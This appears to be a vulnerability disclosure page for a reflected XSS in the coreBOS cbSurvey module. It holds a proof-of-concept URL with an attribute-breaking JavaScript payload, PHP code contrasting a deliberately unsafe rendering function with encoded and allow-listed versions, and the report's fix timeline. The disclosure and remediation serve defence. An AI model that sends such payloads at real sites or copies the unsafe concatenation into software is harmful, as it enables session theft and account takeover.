Reflected XSS in "cbSurvey" module in tsolucio/corebos

Valid

Reported on

Jun 26th 2022


Description

Reflected XSS caused by insufficient sanitization of the "idstring" parameter in the cbSurvey module.

Proof of Concept

https://demo.corebos.com/index.php?module=cbSurvey&action=cbSurveyAjax&file=MassEdit&mode=ajax&idstring=" onfocus=javascript:alert(document.domain) type=txt autofocus="

Impact

Client-side code execution, which can lead to cookie stealing, account takeover, etc.
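The vulnerable pattern next to a hardened one, as an added example that is not coreBOS code and not the fix from the project's commit. It assumes the parameter is echoed into a double-quoted HTML attribute and that "idstring" is meant to carry numeric record ids separated by semicolons; the function names and the markup are hypothetical.

```php
<?php
// Added illustration, not coreBOS code. Assumption: "idstring" is reflected
// into a double-quoted attribute of a form field.

// Vulnerable pattern: the raw request value is concatenated into the markup,
// so a double quote in the input ends the attribute value early.
function render_unsafe(string $idstring): string
{
    return '<input name="idstring" value="' . $idstring . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES turns " and ' into entities, so the value cannot leave the attribute.
function render_encoded(string $idstring): string
{
    $safe = htmlspecialchars($idstring, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input name="idstring" value="' . $safe . '">';
}

// Defence in depth: accept only the expected shape before using the value.
// Assumed format: digits separated by semicolons, optional trailing semicolon.
// Returns the ids as integers, or null when the input does not match.
function parse_idstring(string $idstring): ?array
{
    if (!preg_match('/\A\d+(?:;\d+)*;?\z/', $idstring)) {
        return null;
    }
    $parts = preg_split('/;/', $idstring, -1, PREG_SPLIT_NO_EMPTY);
    return array_map('intval', $parts);
}

// Inputs: the value from the report's proof of concept and a constructed
// well-formed value.
$inputs = [
    '" onfocus=javascript:alert(document.domain) type=txt autofocus="',
    '101;102;103',
];

foreach ($inputs as $input) {
    echo 'unsafe : ', render_unsafe($input), PHP_EOL;
    echo 'encoded: ', render_encoded($input), PHP_EOL;
    echo 'parsed : ', var_export(parse_idstring($input), true), PHP_EOL, PHP_EOL;
}
```

Output encoding is the control that closes the reflection; the allow-list check is an extra layer that rejects malformed values before they reach any template.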

We are processing your report and will contact the tsolucio/corebos team within 24 hours. (a year ago)
We have contacted a member of the tsolucio/corebos team and are waiting to hear back. (a year ago)
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. (a year ago)
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. (a year ago)
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. (a year ago)
Joe Bordes validated this vulnerability. (a year ago)
jhond0e has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Joe Bordes marked this as fixed in 8.0 with commit 8d80af. (a year ago)
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE